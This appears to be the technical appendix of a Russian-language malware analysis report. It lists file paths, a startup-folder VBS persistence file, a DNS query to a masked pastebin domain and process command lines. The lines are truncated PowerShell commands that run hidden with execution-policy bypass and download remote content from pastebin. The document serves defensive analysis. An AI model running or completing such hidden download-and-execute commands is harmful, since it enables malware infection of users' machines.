Техническая информация: пути к файлам, DNS-запрос, параметры окна и командные строки процессов
- %APPDATA%\microsoft\windows\start menu\programs\startup\u.vbs
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %ProgramFiles(x86)%\i.exe
- %TEMP%\3@.vbs
- %ProgramFiles(x86)%\company\newproduct\uninstall.exe
- %ProgramFiles(x86)%\company\newproduct\uninstall.ini
- %TEMP%\nslecaa.tmp\system.dll
- %TEMP%\nslecaa.tmp\modern-wizard.bmp
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- DNS ASK pa###bin.com
- ClassName: '#32770' WindowName: ''
- '%ProgramFiles(x86)%\i.exe'
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\3@.vbs"
- '%WINDIR%\syswow64\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://pastebin...